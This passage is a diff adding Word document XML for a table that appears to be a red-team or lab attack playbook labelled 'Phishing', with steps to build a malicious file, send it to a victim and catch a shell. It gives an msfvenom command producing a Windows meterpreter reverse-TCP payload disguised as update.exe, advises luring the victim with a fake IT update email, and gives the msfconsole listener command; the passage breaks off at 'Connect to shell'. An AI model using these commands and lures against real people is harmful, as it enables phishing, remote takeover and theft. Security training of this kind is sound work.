+          <w:tcPr>
+            <w:tcW w:w="2290" w:type="dxa"/>
+            <w:tcBorders/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Normal"/>
+              <w:widowControl w:val="false"/>
+              <w:bidi w:val="0"/>
+              <w:spacing w:before="0" w:after="160"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+              <w:t>Phishing</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="2290" w:type="dxa"/>
+            <w:tcBorders/>
+            <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Normal"/>
+              <w:widowControl w:val="false"/>
+              <w:bidi w:val="0"/>
+              <w:spacing w:before="0" w:after="160"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+              <w:t>Last Modified</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="3042" w:type="dxa"/>
+            <w:gridSpan w:val="2"/>
+            <w:tcBorders/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Normal"/>
+              <w:widowControl w:val="false"/>
+              <w:bidi w:val="0"/>
+              <w:spacing w:before="0" w:after="160"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+              <w:t>9/10/23</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:trPr>
+          <w:trHeight w:val="411" w:hRule="atLeast"/>
+        </w:trPr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="2022" w:type="dxa"/>
+            <w:gridSpan w:val="2"/>
+            <w:tcBorders/>
+            <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Normal"/>
+              <w:widowControl w:val="false"/>
+              <w:bidi w:val="0"/>
+              <w:spacing w:before="0" w:after="160"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+              <w:t>Staff Required</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="2290" w:type="dxa"/>
+            <w:tcBorders/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Normal"/>
+              <w:widowControl w:val="false"/>
+              <w:bidi w:val="0"/>
+              <w:spacing w:before="0" w:after="160"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+              <w:t>1 Attacker</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="2290" w:type="dxa"/>
+            <w:tcBorders/>
+            <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Normal"/>
+              <w:widowControl w:val="false"/>
+              <w:bidi w:val="0"/>
+              <w:spacing w:before="0" w:after="160"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+              <w:t>Skills Required</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="3042" w:type="dxa"/>
+            <w:gridSpan w:val="2"/>
+            <w:tcBorders/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Normal"/>
+              <w:widowControl w:val="false"/>
+              <w:bidi w:val="0"/>
+              <w:spacing w:before="0" w:after="160"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+              <w:t>Msfvenom, metasploit</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:trPr>
+          <w:trHeight w:val="1834" w:hRule="atLeast"/>
+        </w:trPr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="1528" w:type="dxa"/>
+            <w:tcBorders/>
+            <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Normal"/>
+              <w:widowControl w:val="false"/>
+              <w:bidi w:val="0"/>
+              <w:spacing w:before="0" w:after="160"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Document </w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Normal"/>
+              <w:widowControl w:val="false"/>
+              <w:bidi w:val="0"/>
+              <w:spacing w:before="0" w:after="160"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+              <w:t>Description</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="8116" w:type="dxa"/>
+            <w:gridSpan w:val="5"/>
+            <w:tcBorders/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Normal"/>
+              <w:widowControl w:val="false"/>
+              <w:bidi w:val="0"/>
+              <w:spacing w:before="0" w:after="160"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+              <w:t>This is attack is a phishing attack where the attacker persuades the user to download the reverse shell created by msfvenom</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:trPr>
+          <w:trHeight w:val="395" w:hRule="atLeast"/>
+        </w:trPr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="2022" w:type="dxa"/>
+            <w:gridSpan w:val="2"/>
+            <w:tcBorders/>
+            <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Normal"/>
+              <w:widowControl w:val="false"/>
+              <w:bidi w:val="0"/>
+              <w:spacing w:before="0" w:after="160"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+              <w:t>Step 1</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="6337" w:type="dxa"/>
+            <w:gridSpan w:val="3"/>
+            <w:tcBorders/>
+            <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Normal"/>
+              <w:widowControl w:val="false"/>
+              <w:bidi w:val="0"/>
+              <w:spacing w:before="0" w:after="160"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+              <w:t>Task</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="1285" w:type="dxa"/>
+            <w:tcBorders/>
+            <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Normal"/>
+              <w:widowControl w:val="false"/>
+              <w:bidi w:val="0"/>
+              <w:spacing w:before="0" w:after="160"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+              <w:t>Complete</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:trPr>
+          <w:trHeight w:val="1735" w:hRule="atLeast"/>
+        </w:trPr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="2022" w:type="dxa"/>
+            <w:gridSpan w:val="2"/>
+            <w:tcBorders/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Normal"/>
+              <w:widowControl w:val="false"/>
+              <w:bidi w:val="0"/>
+              <w:spacing w:before="0" w:after="160"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+              <w:t>Create malicious file</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="6337" w:type="dxa"/>
+            <w:gridSpan w:val="3"/>
+            <w:tcBorders/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="PreformattedText"/>
+              <w:widowControl w:val="false"/>
+              <w:bidi w:val="0"/>
+              <w:spacing w:before="0" w:after="160"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+            </w:pPr>
+            <w:bookmarkStart w:id="0" w:name="msfvenom-command"/>
+            <w:bookmarkEnd w:id="0"/>
+            <w:r>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+              <w:t>msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.10 LPORT=9001 -f exe -o update.exe</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Normal"/>
+              <w:widowControl w:val="false"/>
+              <w:bidi w:val="0"/>
+              <w:spacing w:before="0" w:after="160"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr/>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="1285" w:type="dxa"/>
+            <w:tcBorders/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Normal"/>
+              <w:widowControl w:val="false"/>
+              <w:bidi w:val="0"/>
+              <w:spacing w:before="0" w:after="160"/>
+              <w:jc w:val="center"/>
+              <w:rPr>
+                <w:sz w:val="48"/>
+                <w:szCs w:val="48"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="48"/>
+                <w:szCs w:val="48"/>
+              </w:rPr>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:trPr>
+          <w:trHeight w:val="395" w:hRule="atLeast"/>
+        </w:trPr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="2022" w:type="dxa"/>
+            <w:gridSpan w:val="2"/>
+            <w:tcBorders/>
+            <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Normal"/>
+              <w:widowControl w:val="false"/>
+              <w:bidi w:val="0"/>
+              <w:spacing w:before="0" w:after="160"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+              <w:t>Step 2</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="6337" w:type="dxa"/>
+            <w:gridSpan w:val="3"/>
+            <w:tcBorders/>
+            <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Normal"/>
+              <w:widowControl w:val="false"/>
+              <w:bidi w:val="0"/>
+              <w:spacing w:before="0" w:after="160"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+              <w:t>Task</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="1285" w:type="dxa"/>
+            <w:tcBorders/>
+            <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Normal"/>
+              <w:widowControl w:val="false"/>
+              <w:bidi w:val="0"/>
+              <w:spacing w:before="0" w:after="160"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+              <w:t>Complete</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:trPr>
+          <w:trHeight w:val="1837" w:hRule="atLeast"/>
+        </w:trPr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="2022" w:type="dxa"/>
+            <w:gridSpan w:val="2"/>
+            <w:tcBorders/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Normal"/>
+              <w:widowControl w:val="false"/>
+              <w:bidi w:val="0"/>
+              <w:spacing w:before="0" w:after="160"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+              <w:t>Send file to victim</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="6337" w:type="dxa"/>
+            <w:gridSpan w:val="3"/>
+            <w:tcBorders/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Normal"/>
+              <w:widowControl w:val="false"/>
+              <w:bidi w:val="0"/>
+              <w:spacing w:before="0" w:after="160"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:i w:val="false"/>
+                <w:iCs w:val="false"/>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+              <w:t>Send file to victim with persuading text e.g. download update for software, email by IT team</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="1285" w:type="dxa"/>
+            <w:tcBorders/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Normal"/>
+              <w:widowControl w:val="false"/>
+              <w:bidi w:val="0"/>
+              <w:spacing w:before="0" w:after="160"/>
+              <w:jc w:val="center"/>
+              <w:rPr>
+                <w:sz w:val="48"/>
+                <w:szCs w:val="48"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="48"/>
+                <w:szCs w:val="48"/>
+              </w:rPr>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:trPr>
+          <w:trHeight w:val="395" w:hRule="atLeast"/>
+        </w:trPr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="2022" w:type="dxa"/>
+            <w:gridSpan w:val="2"/>
+            <w:tcBorders/>
+            <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Normal"/>
+              <w:widowControl w:val="false"/>
+              <w:bidi w:val="0"/>
+              <w:spacing w:before="0" w:after="160"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+              <w:t>Step 3</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="6337" w:type="dxa"/>
+            <w:gridSpan w:val="3"/>
+            <w:tcBorders/>
+            <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Normal"/>
+              <w:widowControl w:val="false"/>
+              <w:bidi w:val="0"/>
+              <w:spacing w:before="0" w:after="160"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+              <w:t>Task</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="1285" w:type="dxa"/>
+            <w:tcBorders/>
+            <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Normal"/>
+              <w:widowControl w:val="false"/>
+              <w:bidi w:val="0"/>
+              <w:spacing w:before="0" w:after="160"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+              <w:t>Complete</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:trPr>
+          <w:trHeight w:val="1716" w:hRule="atLeast"/>
+        </w:trPr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="2022" w:type="dxa"/>
+            <w:gridSpan w:val="2"/>
+            <w:tcBorders/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Normal"/>
+              <w:widowControl w:val="false"/>
+              <w:bidi w:val="0"/>
+              <w:spacing w:before="0" w:after="160"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+              <w:t>Listen for shell</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="6337" w:type="dxa"/>
+            <w:gridSpan w:val="3"/>
+            <w:tcBorders/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="PreformattedText"/>
+              <w:widowControl w:val="false"/>
+              <w:bidi w:val="0"/>
+              <w:spacing w:before="0" w:after="160"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+            </w:pPr>
+            <w:bookmarkStart w:id="1" w:name="listener-command"/>
+            <w:bookmarkEnd w:id="1"/>
+            <w:r>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+              <w:t>msfconsole -q -x "use multi/handler; set payload windows/x64/meterpreter/reverse_tcp; set lhost 192.168.0.10; set lport 9001; exploit"</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Normal"/>
+              <w:widowControl w:val="false"/>
+              <w:bidi w:val="0"/>
+              <w:spacing w:before="0" w:after="160"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr/>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="1285" w:type="dxa"/>
+            <w:tcBorders/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Normal"/>
+              <w:widowControl w:val="false"/>
+              <w:bidi w:val="0"/>
+              <w:spacing w:before="0" w:after="160"/>
+              <w:jc w:val="center"/>
+              <w:rPr>
+                <w:sz w:val="48"/>
+                <w:szCs w:val="48"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="48"/>
+                <w:szCs w:val="48"/>
+              </w:rPr>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:trPr>
+          <w:trHeight w:val="395" w:hRule="atLeast"/>
+        </w:trPr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="2022" w:type="dxa"/>
+            <w:gridSpan w:val="2"/>
+            <w:tcBorders/>
+            <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Normal"/>
+              <w:widowControl w:val="false"/>
+              <w:bidi w:val="0"/>
+              <w:spacing w:before="0" w:after="160"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+              <w:t>Step 4</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="6337" w:type="dxa"/>
+            <w:gridSpan w:val="3"/>
+            <w:tcBorders/>
+            <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Normal"/>
+              <w:widowControl w:val="false"/>
+              <w:bidi w:val="0"/>
+              <w:spacing w:before="0" w:after="160"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+              <w:t>Task</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="1285" w:type="dxa"/>
+            <w:tcBorders/>
+            <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Normal"/>
+              <w:widowControl w:val="false"/>
+              <w:bidi w:val="0"/>
+              <w:spacing w:before="0" w:after="160"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+              <w:t>Complete</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:trPr>
+          <w:trHeight w:val="1718" w:hRule="atLeast"/>
+        </w:trPr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="2022" w:type="dxa"/>
+            <w:gridSpan w:val="2"/>
+            <w:tcBorders/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Normal"/>
+              <w:widowControl w:val="false"/>
+              <w:bidi w:val="0"/>
+              <w:spacing w:before="0" w:after="160"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+              <w:t>Connect to shell</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
